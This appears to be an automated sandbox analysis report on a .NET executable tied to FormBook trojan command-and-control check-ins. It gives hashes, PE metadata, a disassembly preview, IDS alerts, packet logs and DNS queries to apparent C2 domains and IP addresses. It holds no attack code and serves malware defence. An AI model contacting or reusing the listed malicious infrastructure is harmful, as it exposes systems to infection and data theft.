	scan of order 1231.xlsm	Get hash	malicious	Browse	160.153.133.77
	copy of check 542554.xlsm	Get hash	malicious	Browse	160.153.133.77
	scan of order 2570.xlsm	Get hash	malicious	Browse	160.153.133.77
	document 23513.xlsm	Get hash	malicious	Browse	160.153.133.77
	export of payment 2993132.xlsm	Get hash	malicious	Browse	160.153.133.77
	products order pdf .exe	Get hash	malicious	Browse	160.153.128.3
	60b88477_by_Libranalysis.exe	Get hash	malicious	Browse	160.153.137.210

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\00098765123POIIU.exe.log Download File
Process:	C:\Users\user\Desktop\00098765123POIIU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.883159451685763
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	00098765123POIIU.exe
File size:	968192
MD5:	4e2d6ab0c9a56aee76ba33bd26dce9b1
SHA1:	52950b4637fc55518efc063ced7bec0867f9051e
SHA256:	5e2255d59560c85c4a6c30ffa54e00b2805b584292de464befaf01a614539229
SHA512:	f9880e28f784bbee81cecfcd4a4ad7cb61cd5b37f8ea18340d894e0825b83e40ec34cd318c6cec273f5b21e8013a1212878d9db5465a16b7517d5d649d17bca1
SSDEEP:	12288:H0g5qL6Evo89Ak5qLLmWr56mlfNJ/P9KLPsU37zASu4Gqi7OToe3XHiQgVw5qLcc:HxI6jwdILm3mlfNJ/P9Krzrnue5OOIRx
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X-.`.....................0........... ........@.. ....................... ............@................................

File Icon


Icon Hash:	f2d2e9fcc4ead362

Static PE Info

General
Entrypoint:	0x4eb3ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x609B2D58 [Wed May 12 01:20:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xeb354	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xee000	0x2d24	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xec000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe93b4	0xe9400	False	0.914642366693	data	7.9019999335	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0xec000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xee000	0x2d24	0x2e00	False	0.364639945652	data	5.10988831847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xee130	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON	0xf06d8	0x14	data
RT_VERSION	0xf06ec	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST	0xf0a78	0x2aa	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2013
Assembly Version	3.0.0.0
InternalName	ApplicationStateDisposition.exe
FileVersion	3.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	ServerManager_Core
ProductVersion	3.0.0.0
FileDescription	ServerManager_Core
OriginalFilename	ApplicationStateDisposition.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/12/21-08:41:58.906670	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49737	34.102.136.180	192.168.2.6
05/12/21-08:42:09.429548	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49739	34.102.136.180	192.168.2.6
05/12/21-08:42:20.500357	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.6	173.236.152.151
05/12/21-08:42:20.500357	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.6	173.236.152.151
05/12/21-08:42:20.500357	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.6	173.236.152.151
05/12/21-08:42:41.336273	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49748	34.102.136.180	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 08:41:47.990514040 CEST	49731	80	192.168.2.6	199.192.23.253
May 12, 2021 08:41:48.184983015 CEST	80	49731	199.192.23.253	192.168.2.6
May 12, 2021 08:41:48.185359955 CEST	49731	80	192.168.2.6	199.192.23.253
May 12, 2021 08:41:48.185560942 CEST	49731	80	192.168.2.6	199.192.23.253
May 12, 2021 08:41:48.381515026 CEST	80	49731	199.192.23.253	192.168.2.6
May 12, 2021 08:41:48.454969883 CEST	80	49731	199.192.23.253	192.168.2.6
May 12, 2021 08:41:48.454998970 CEST	80	49731	199.192.23.253	192.168.2.6
May 12, 2021 08:41:48.455245972 CEST	49731	80	192.168.2.6	199.192.23.253
May 12, 2021 08:41:48.455327988 CEST	49731	80	192.168.2.6	199.192.23.253
May 12, 2021 08:41:48.650408030 CEST	80	49731	199.192.23.253	192.168.2.6
May 12, 2021 08:41:53.533854961 CEST	49734	80	192.168.2.6	64.190.62.111
May 12, 2021 08:41:53.579214096 CEST	80	49734	64.190.62.111	192.168.2.6
May 12, 2021 08:41:53.579309940 CEST	49734	80	192.168.2.6	64.190.62.111
May 12, 2021 08:41:53.579425097 CEST	49734	80	192.168.2.6	64.190.62.111
May 12, 2021 08:41:53.624849081 CEST	80	49734	64.190.62.111	192.168.2.6
May 12, 2021 08:41:53.655127048 CEST	80	49734	64.190.62.111	192.168.2.6
May 12, 2021 08:41:53.655168056 CEST	80	49734	64.190.62.111	192.168.2.6
May 12, 2021 08:41:53.655359983 CEST	49734	80	192.168.2.6	64.190.62.111
May 12, 2021 08:41:53.655395031 CEST	49734	80	192.168.2.6	64.190.62.111
May 12, 2021 08:41:53.702003002 CEST	80	49734	64.190.62.111	192.168.2.6
May 12, 2021 08:41:58.728107929 CEST	49737	80	192.168.2.6	34.102.136.180
May 12, 2021 08:41:58.769252062 CEST	80	49737	34.102.136.180	192.168.2.6
May 12, 2021 08:41:58.769377947 CEST	49737	80	192.168.2.6	34.102.136.180
May 12, 2021 08:41:58.769610882 CEST	49737	80	192.168.2.6	34.102.136.180
May 12, 2021 08:41:58.810611963 CEST	80	49737	34.102.136.180	192.168.2.6
May 12, 2021 08:41:58.906670094 CEST	80	49737	34.102.136.180	192.168.2.6
May 12, 2021 08:41:58.906706095 CEST	80	49737	34.102.136.180	192.168.2.6
May 12, 2021 08:41:58.906847954 CEST	49737	80	192.168.2.6	34.102.136.180
May 12, 2021 08:41:58.906909943 CEST	49737	80	192.168.2.6	34.102.136.180
May 12, 2021 08:41:58.948246956 CEST	80	49737	34.102.136.180	192.168.2.6
May 12, 2021 08:42:04.038467884 CEST	49738	80	192.168.2.6	172.217.168.83
May 12, 2021 08:42:04.093427896 CEST	80	49738	172.217.168.83	192.168.2.6
May 12, 2021 08:42:04.093615055 CEST	49738	80	192.168.2.6	172.217.168.83
May 12, 2021 08:42:04.093743086 CEST	49738	80	192.168.2.6	172.217.168.83
May 12, 2021 08:42:04.147674084 CEST	80	49738	172.217.168.83	192.168.2.6
May 12, 2021 08:42:04.168349028 CEST	80	49738	172.217.168.83	192.168.2.6
May 12, 2021 08:42:04.168392897 CEST	80	49738	172.217.168.83	192.168.2.6
May 12, 2021 08:42:04.168421030 CEST	80	49738	172.217.168.83	192.168.2.6
May 12, 2021 08:42:04.168565989 CEST	49738	80	192.168.2.6	172.217.168.83
May 12, 2021 08:42:04.168693066 CEST	49738	80	192.168.2.6	172.217.168.83
May 12, 2021 08:42:04.223028898 CEST	80	49738	172.217.168.83	192.168.2.6
May 12, 2021 08:42:09.251142025 CEST	49739	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:09.292185068 CEST	80	49739	34.102.136.180	192.168.2.6
May 12, 2021 08:42:09.292366028 CEST	49739	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:09.292547941 CEST	49739	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:09.333488941 CEST	80	49739	34.102.136.180	192.168.2.6
May 12, 2021 08:42:09.429548025 CEST	80	49739	34.102.136.180	192.168.2.6
May 12, 2021 08:42:09.429599047 CEST	80	49739	34.102.136.180	192.168.2.6
May 12, 2021 08:42:09.429847002 CEST	49739	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:09.429889917 CEST	49739	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:09.471201897 CEST	80	49739	34.102.136.180	192.168.2.6
May 12, 2021 08:42:14.688649893 CEST	49740	80	192.168.2.6	45.39.20.158
May 12, 2021 08:42:14.893313885 CEST	80	49740	45.39.20.158	192.168.2.6
May 12, 2021 08:42:14.893541098 CEST	49740	80	192.168.2.6	45.39.20.158
May 12, 2021 08:42:14.893963099 CEST	49740	80	192.168.2.6	45.39.20.158
May 12, 2021 08:42:15.098444939 CEST	80	49740	45.39.20.158	192.168.2.6
May 12, 2021 08:42:15.098475933 CEST	80	49740	45.39.20.158	192.168.2.6
May 12, 2021 08:42:15.098488092 CEST	80	49740	45.39.20.158	192.168.2.6
May 12, 2021 08:42:15.098676920 CEST	49740	80	192.168.2.6	45.39.20.158
May 12, 2021 08:42:15.098736048 CEST	49740	80	192.168.2.6	45.39.20.158
May 12, 2021 08:42:15.306457043 CEST	80	49740	45.39.20.158	192.168.2.6
May 12, 2021 08:42:20.359623909 CEST	49744	80	192.168.2.6	173.236.152.151
May 12, 2021 08:42:20.499883890 CEST	80	49744	173.236.152.151	192.168.2.6
May 12, 2021 08:42:20.500035048 CEST	49744	80	192.168.2.6	173.236.152.151
May 12, 2021 08:42:20.500356913 CEST	49744	80	192.168.2.6	173.236.152.151
May 12, 2021 08:42:20.640467882 CEST	80	49744	173.236.152.151	192.168.2.6
May 12, 2021 08:42:20.640997887 CEST	80	49744	173.236.152.151	192.168.2.6
May 12, 2021 08:42:20.641031981 CEST	80	49744	173.236.152.151	192.168.2.6
May 12, 2021 08:42:20.641415119 CEST	49744	80	192.168.2.6	173.236.152.151
May 12, 2021 08:42:20.641587973 CEST	49744	80	192.168.2.6	173.236.152.151
May 12, 2021 08:42:20.781630993 CEST	80	49744	173.236.152.151	192.168.2.6
May 12, 2021 08:42:25.719095945 CEST	49745	80	192.168.2.6	160.153.132.205
May 12, 2021 08:42:25.770159006 CEST	80	49745	160.153.132.205	192.168.2.6
May 12, 2021 08:42:25.770363092 CEST	49745	80	192.168.2.6	160.153.132.205
May 12, 2021 08:42:25.770747900 CEST	49745	80	192.168.2.6	160.153.132.205
May 12, 2021 08:42:25.821537018 CEST	80	49745	160.153.132.205	192.168.2.6
May 12, 2021 08:42:25.841358900 CEST	80	49745	160.153.132.205	192.168.2.6
May 12, 2021 08:42:25.841398954 CEST	80	49745	160.153.132.205	192.168.2.6
May 12, 2021 08:42:25.841413975 CEST	80	49745	160.153.132.205	192.168.2.6
May 12, 2021 08:42:25.841631889 CEST	49745	80	192.168.2.6	160.153.132.205
May 12, 2021 08:42:25.841754913 CEST	49745	80	192.168.2.6	160.153.132.205
May 12, 2021 08:42:25.892359972 CEST	80	49745	160.153.132.205	192.168.2.6
May 12, 2021 08:42:41.156760931 CEST	49748	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:41.199326038 CEST	80	49748	34.102.136.180	192.168.2.6
May 12, 2021 08:42:41.199471951 CEST	49748	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:41.199654102 CEST	49748	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:41.240564108 CEST	80	49748	34.102.136.180	192.168.2.6
May 12, 2021 08:42:41.336272955 CEST	80	49748	34.102.136.180	192.168.2.6
May 12, 2021 08:42:41.336301088 CEST	80	49748	34.102.136.180	192.168.2.6
May 12, 2021 08:42:41.336494923 CEST	49748	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:41.336566925 CEST	49748	80	192.168.2.6	34.102.136.180
May 12, 2021 08:42:41.378762960 CEST	80	49748	34.102.136.180	192.168.2.6
May 12, 2021 08:42:51.795253038 CEST	49749	80	192.168.2.6	198.54.117.217
May 12, 2021 08:42:51.992503881 CEST	80	49749	198.54.117.217	192.168.2.6
May 12, 2021 08:42:51.992718935 CEST	49749	80	192.168.2.6	198.54.117.217
May 12, 2021 08:42:51.992958069 CEST	49749	80	192.168.2.6	198.54.117.217
May 12, 2021 08:42:52.190454960 CEST	80	49749	198.54.117.217	192.168.2.6
May 12, 2021 08:42:52.190479994 CEST	80	49749	198.54.117.217	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 08:40:39.068361998 CEST	49283	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:39.114054918 CEST	58377	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:39.128588915 CEST	53	49283	8.8.8.8	192.168.2.6
May 12, 2021 08:40:39.179604053 CEST	53	58377	8.8.8.8	192.168.2.6
May 12, 2021 08:40:40.683062077 CEST	55074	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:40.731836081 CEST	53	55074	8.8.8.8	192.168.2.6
May 12, 2021 08:40:41.577227116 CEST	54513	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:41.628846884 CEST	53	54513	8.8.8.8	192.168.2.6
May 12, 2021 08:40:42.107254982 CEST	62044	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:42.168605089 CEST	53	62044	8.8.8.8	192.168.2.6
May 12, 2021 08:40:42.924268961 CEST	63791	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:42.975831985 CEST	53	63791	8.8.8.8	192.168.2.6
May 12, 2021 08:40:44.282483101 CEST	64267	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:44.334367037 CEST	53	64267	8.8.8.8	192.168.2.6
May 12, 2021 08:40:46.312216997 CEST	49448	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:46.361088037 CEST	53	49448	8.8.8.8	192.168.2.6
May 12, 2021 08:40:47.150537014 CEST	60342	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:47.199246883 CEST	53	60342	8.8.8.8	192.168.2.6
May 12, 2021 08:40:47.988475084 CEST	61346	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:48.037570953 CEST	53	61346	8.8.8.8	192.168.2.6
May 12, 2021 08:40:49.129786015 CEST	51774	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:49.178658962 CEST	53	51774	8.8.8.8	192.168.2.6
May 12, 2021 08:40:50.392833948 CEST	56023	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:50.445292950 CEST	53	56023	8.8.8.8	192.168.2.6
May 12, 2021 08:40:51.367477894 CEST	58384	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:51.417063951 CEST	53	58384	8.8.8.8	192.168.2.6
May 12, 2021 08:40:52.251118898 CEST	60261	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:52.308456898 CEST	53	60261	8.8.8.8	192.168.2.6
May 12, 2021 08:40:54.054757118 CEST	56061	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:54.115659952 CEST	53	56061	8.8.8.8	192.168.2.6
May 12, 2021 08:40:55.203450918 CEST	58336	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:55.252172947 CEST	53	58336	8.8.8.8	192.168.2.6
May 12, 2021 08:40:56.035790920 CEST	53781	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:56.084594965 CEST	53	53781	8.8.8.8	192.168.2.6
May 12, 2021 08:40:57.144754887 CEST	54064	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:57.196247101 CEST	53	54064	8.8.8.8	192.168.2.6
May 12, 2021 08:40:57.969147921 CEST	52811	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:58.017726898 CEST	53	52811	8.8.8.8	192.168.2.6
May 12, 2021 08:40:58.856585026 CEST	55299	53	192.168.2.6	8.8.8.8
May 12, 2021 08:40:58.905508995 CEST	53	55299	8.8.8.8	192.168.2.6
May 12, 2021 08:41:17.154485941 CEST	63745	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:17.225435972 CEST	53	63745	8.8.8.8	192.168.2.6
May 12, 2021 08:41:23.844883919 CEST	50055	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:23.920362949 CEST	53	50055	8.8.8.8	192.168.2.6
May 12, 2021 08:41:34.483180046 CEST	61374	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:34.548908949 CEST	53	61374	8.8.8.8	192.168.2.6
May 12, 2021 08:41:41.866447926 CEST	50339	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:42.026329041 CEST	53	50339	8.8.8.8	192.168.2.6
May 12, 2021 08:41:43.031661987 CEST	63307	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:43.169805050 CEST	53	63307	8.8.8.8	192.168.2.6
May 12, 2021 08:41:43.723687887 CEST	49694	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:43.780988932 CEST	53	49694	8.8.8.8	192.168.2.6
May 12, 2021 08:41:44.208921909 CEST	54982	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:44.364655972 CEST	53	54982	8.8.8.8	192.168.2.6
May 12, 2021 08:41:44.894913912 CEST	50010	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:44.965607882 CEST	53	50010	8.8.8.8	192.168.2.6
May 12, 2021 08:41:44.971998930 CEST	63718	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:45.024848938 CEST	53	63718	8.8.8.8	192.168.2.6
May 12, 2021 08:41:45.619128942 CEST	62116	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:45.679409027 CEST	53	62116	8.8.8.8	192.168.2.6
May 12, 2021 08:41:46.161278963 CEST	63816	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:46.210536003 CEST	53	63816	8.8.8.8	192.168.2.6
May 12, 2021 08:41:47.076004028 CEST	55014	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:47.141442060 CEST	53	55014	8.8.8.8	192.168.2.6
May 12, 2021 08:41:47.924146891 CEST	62208	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:47.982878923 CEST	53	62208	8.8.8.8	192.168.2.6
May 12, 2021 08:41:48.178400040 CEST	57574	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:48.239283085 CEST	53	57574	8.8.8.8	192.168.2.6
May 12, 2021 08:41:48.691677094 CEST	51818	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:48.748836994 CEST	53	51818	8.8.8.8	192.168.2.6
May 12, 2021 08:41:53.464710951 CEST	56628	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:53.532840967 CEST	53	56628	8.8.8.8	192.168.2.6
May 12, 2021 08:41:55.650001049 CEST	60778	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:55.711256981 CEST	53	60778	8.8.8.8	192.168.2.6
May 12, 2021 08:41:58.666215897 CEST	53799	53	192.168.2.6	8.8.8.8
May 12, 2021 08:41:58.726906061 CEST	53	53799	8.8.8.8	192.168.2.6
May 12, 2021 08:42:03.935830116 CEST	54683	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:04.036597967 CEST	53	54683	8.8.8.8	192.168.2.6
May 12, 2021 08:42:09.184465885 CEST	59329	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:09.249818087 CEST	53	59329	8.8.8.8	192.168.2.6
May 12, 2021 08:42:14.469540119 CEST	64021	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:14.686325073 CEST	53	64021	8.8.8.8	192.168.2.6
May 12, 2021 08:42:18.616276026 CEST	56129	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:18.692198992 CEST	53	56129	8.8.8.8	192.168.2.6
May 12, 2021 08:42:20.132292986 CEST	58177	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:20.357342958 CEST	53	58177	8.8.8.8	192.168.2.6
May 12, 2021 08:42:25.655632019 CEST	50700	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:25.717556953 CEST	53	50700	8.8.8.8	192.168.2.6
May 12, 2021 08:42:28.659461975 CEST	54069	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:28.725168943 CEST	53	54069	8.8.8.8	192.168.2.6
May 12, 2021 08:42:30.194370985 CEST	61178	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:30.268462896 CEST	53	61178	8.8.8.8	192.168.2.6
May 12, 2021 08:42:30.864399910 CEST	57017	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:30.925359011 CEST	53	57017	8.8.8.8	192.168.2.6
May 12, 2021 08:42:35.979862928 CEST	56327	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:36.062607050 CEST	53	56327	8.8.8.8	192.168.2.6
May 12, 2021 08:42:41.084408045 CEST	50243	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:41.155487061 CEST	53	50243	8.8.8.8	192.168.2.6
May 12, 2021 08:42:46.347724915 CEST	62055	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:46.695276022 CEST	53	62055	8.8.8.8	192.168.2.6
May 12, 2021 08:42:51.731790066 CEST	61249	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:51.793900967 CEST	53	61249	8.8.8.8	192.168.2.6
May 12, 2021 08:42:57.204747915 CEST	65252	53	192.168.2.6	8.8.8.8
May 12, 2021 08:42:57.513603926 CEST	53	65252	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 08:41:47.924146891 CEST	192.168.2.6	8.8.8.8	0xb15	Standard query (0)	www.contorig2.com	A (IP address)	IN (0x0001)
May 12, 2021 08:41:53.464710951 CEST	192.168.2.6	8.8.8.8	0x7f6d	Standard query (0)	www.muldentaxi.com	A (IP address)	IN (0x0001)
May 12, 2021 08:41:58.666215897 CEST	192.168.2.6	8.8.8.8	0x94d9	Standard query (0)	www.gofourd.com	A (IP address)	IN (0x0001)
May 12, 2021 08:42:03.935830116 CEST	192.168.2.6	8.8.8.8	0xeeb7	Standard query (0)	www.ihdeuruim.com	A (IP address)	IN (0x0001)
May 12, 2021 08:42:09.184465885 CEST	192.168.2.6	8.8.8.8	0xc56	Standard query (0)	www.embraceblm.com	A (IP address)	IN (0x0001)
May 12, 2021 08:42:14.469540119 CEST	192.168.2.6	8.8.8.8	0x26ee	Standard query (0)	www.ytksw.com	A (IP address)	IN (0x0001)
May 12, 2021 08:42:20.132292986 CEST	192.168.2.6	8.8.8.8	0xfde1	Standard query (0)	www.buraktradingltd.com	A (IP address)	IN (0x0001)
May 12, 2021 08:42:25.655632019 CEST	192.168.2.6	8.8.8.8	0x60ad	Standard query (0)	www.bogolacke.com	A (IP address)	IN (0x0001)
May 12, 2021 08:42:30.864399910 CEST	192.168.2.6	8.8.8.8	0xbd0c	Standard query (0)	www.soccer-yokouchi.club	A (IP address)	IN (0x0001)
May 12, 2021 08:42:35.979862928 CEST	192.168.2.6	8.8.8.8	0x73fb	Standard query (0)	www.maraitime.com	A (IP address)	IN (0x0001)
